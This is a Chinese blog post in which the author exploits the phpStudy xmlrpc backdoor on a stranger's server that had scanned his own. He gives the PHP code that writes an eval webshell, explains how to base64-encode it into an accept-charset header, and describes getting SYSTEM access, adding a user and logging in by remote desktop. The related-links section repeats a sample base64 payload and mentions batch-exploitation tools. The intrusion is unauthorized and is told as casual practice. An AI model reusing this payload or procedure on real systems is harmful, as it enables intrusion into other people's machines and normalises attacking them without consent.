phpstudy后门getshell

最新推荐文章于 2025-04-22 11:49:39 发布
最新推荐文章于 2025-04-22 11:49:39 发布
阅读量3.7k 收藏 6
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hsj_csdn/article/details/102558115
版权
本文通过一次意外的网络扫描事件,揭示了利用存在后门的PHPStudy服务器获取远程控制权限的过程。作者详细记录了从发现可疑探针到成功GetShell的步骤,包括利用特定HTTP请求头注入恶意代码、验证权限及后续提权操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

昨天在测试时候监听着我自己服务器的80端口,突然有个请求过来了。。一看ip,和我在同一个公网网段。可能是有人在扫我吧。

在浏览器里直接访问他的ip,发现80端口上搭了一个php服务。直接访问是一个phpstudy的探针。

 

看到phpstudy,忽然想起前些天的phpstudy后门。在网上查了一下,

我看的是这篇文章:

https://www.cnblogs.com/-qing-/p/11575622.html

看了一下,这个服务器支持 xmlrpc 模块,

在这个探针中可以看到当前路径和www的路径是 c:\phpstudy\www\

看了一下文章,基本就是这么回事:如果你的phpstudy有后门,可以在该环境中执行任意php代码。代码的位置在,发往这个服务器的任何http请求头中,增加一个字段,accept-charset,这个字段的值,就是将代码base64编码以后的结果。

 

将一段php写文件的代码编码一下:

$myfile=fopen("c:\phpstudy\www\p.php","w");$t="<?php @eval($_POST['666999ttt']) ?>";fwrite($myfile,$t);fclose($myfile);

然后请求一下根目录,抓包,并在请求头重添加 accept-charset 字段,这个字段的值是上面base64编码的结果,

 

注意发请求时候有个坑,在上面的Accept-Encoding字段里,“deflate”前面默认是有一个空格的,带着这个空格发请求的话代码会执行失败,把这个空格删去就好了。

菜刀连接http://xx.xx.xx.xx/p.php,使用的参数是666999ttt,然后就getshell了,

打开菜刀里的命令终端,执行一下whoami,看一下权限,是system,看起来权限还很大…只能说phpstudy牛皮!

接下来就是增加用户、添加权限等操作了。下面是添加好用户远程桌面连接的截图。

发现php里面getshell的骚思路还是很多的,打算接下来练练手。

php命令执行后门,phpstudy后门利用方法及getshell
weixin_33207144的博客
03-10 1095
0x01 phpstudy利用方法请求任意后缀为php的文件目标环境为php5.2,5.4,且不能为nts存在Accept-Encoding: gzip,deflate此处填写base64加密后的payload:accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOwGET/phpinfo.phpHTTP/1.1Host:192.168.1.1User-Agent...
(三)phpstudy下开启mysql,运用phpmyadmin管理执行sql语句,写入一句话后门getshell
爱上卿的博客
01-15 3807
学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。 1 启动phpstudy,出现mysql无法启动的问题 因为之前已经装...
phpStudy 后门版.rar
09-24
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。
0day 挖到手软,403 到 getshell,从零基础到精通,收藏这篇就够了!_最新getshell
最新发布
喜欢Python编程的程序员柚柚呀
04-22 870
一顿操作下来,漏洞不少。但是,看了下供应链,注册资金3kw,没证书,G!
python phpstudy_GitHub - Writeup007/phpStudyBackDoor: phpStudy后门检测与利用工具,Python脚本,可一键 GetShell。...
weixin_39517902的博客
12-04 236
phpStudyBackDoorphpStudy后门检测与利用工具,Python脚本,可一键 GetShell。简述2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网语2016年被非法入侵,然后软件安装包(php_xmlrpc.dll)被植入后门,可进行执行远程命令执行。此工具为 Python 3 编写,支持单 url 检测和批量 ...
phpstudy后门
一个普普通通的博客
04-17 1595
phpstudy后门 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样一款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据 回传大量敏感信 二、后门
phpstudy后门(转自feng)
qq_45290991的博客
10-07 2083
几天前火绒说我的PHPstudy有马,我以为是误报没有在意,但接着我就在知乎上看到了PHPstudy真可能有后门,于是赶紧看了一下,还真有,是我之前下的2016版的,而我在官网下的2019的phpstudy_pro没有问题(文末给出了有后门(!!!)的安装包) 可以看到php-5....
phpstudy后门利用
weixin_42140534的博客
03-25 900
0x01 漏洞简介 phpstudy是一个对初学php的人们很有帮助的工具,他集成的环境可以给初学者带来很多便捷之处,但是某些版本存在后门,如果服务器使用存在后门phpstudy搭建,这样可以直接被人家getshell 0x02 影响版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 0x03 ...
phpstudy后门rce批量利用脚本的实现
10-15
本文主要探讨了如何实现针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。PHPStudy是一款集成多种版本的PHP环境管理工具,但有时可能存在安全漏洞,允许攻击者通过特定的HTTP请求执行任意系统命令,这就是所谓的...
记一次phpstudy后门引发的渗透测试
wuli1024的博客
01-19 1418
前段时间 phpstudy 被爆出存在后门,想到学校里的许多站都是用 phpstudy 做的环境,于是写了个脚本扫描了下,发现真的有中招的。
php study 后门,phpstudy真的有后门吗?是的!附后门查询及解决办法-Go语言中文社区...
weixin_31600439的博客
03-10 317
网上看到phpstudy后门,简单探索复现了下,果然,不知不觉已经沦为肉鸡中的一员....目前测试发现phpStudy2016和phpStudy2018版本存在后门.简单记录下过程:环境配置phpstudy 2018php 5.4.45配置文件php.iniextension=php_xmlrpc.dll //该扩展默认开启漏洞验证漏洞定位/phpStudy2018/PHPTutorial...
批量getshell教程+工具
07-28
批量getshell教程+工具
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3703
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
php study 后门,phpStudy后门简要分析
weixin_31727937的博客
03-10 257
问题概要有问题的版本如下phpStudy20180211版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dllphpStudy20161103版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dll注:这两个官网下载的版本里,都没有发现php5.3版本下存在有问题的php_xmlrpc.dll,打开时会提示存在pdb路径...
phpstudy后门简单分析
fa1lr4in的小博客
09-25 1800
感谢pcat师傅的文章:https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw 20号得知phphstudy有后门,不知道官网的是不是也被入侵了,当时没有进行查看,,,由于当时正在秋招面试比较忙,鸽了几天有了下文: 被中马的为php_xmlrpc.dll这个dll文件,这个可以通过查找泄露字符串很容易通过脚本实现,就不贴了,可以以eval为关键...
phpstudy后门POC分析和EXP开发
qq_35664104的博客
01-24 2577
POC 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 后门存在于*\ext\php_xmlrpc.dll,用记
PhpStudy后门漏洞
chaojixiaojingang
09-08 5052
1.影响版本 phpstudy 2016版php-5.2.17 phpstudy 2016版php-5.4.45 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 2.后门检测分析 1)通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中 (1)phpStudy2016路径: php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll (2)phpStudy20
phpstudy mysql日志_(实战)phpstudy的漏洞+数据库日志写shell
weixin_33162568的博客
01-28 506
——真正的才智是刚毅的志向。今天没学多少东西,直到下午在看别人的文章的时候看到了phpstudy0day的关键词,好奇就查了查。其实这个洞有一段时间了,然后就准备google试试还能不能找到有洞的网站,直接google搜phpstudy 探针 2014。结果是这样的 ,我不得不感叹google太强了。前几页我就不打算看了,基本上已经被日穿了,或者洞补了。所以干脆向后面翻,说实话运气很重要,我刚尝试...
python phpstudy_phpStudy后门分析及复现
weixin_39604092的博客
12-10 263
参考文章:https://blog.youkuaiyun.com/qq_38484285/article/details/101381883感谢大佬分享!!SSRF漏洞学习终于告一段落,很早就知道phpstudy爆出来有后门,爆出漏洞的过程好像还挺奇葩的,时间也不算很充裕,今天简单学习下。影响版本目前已知受影响的phpStudy版本phpstudy 2016版php-5.4phpstudy 2018版php-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值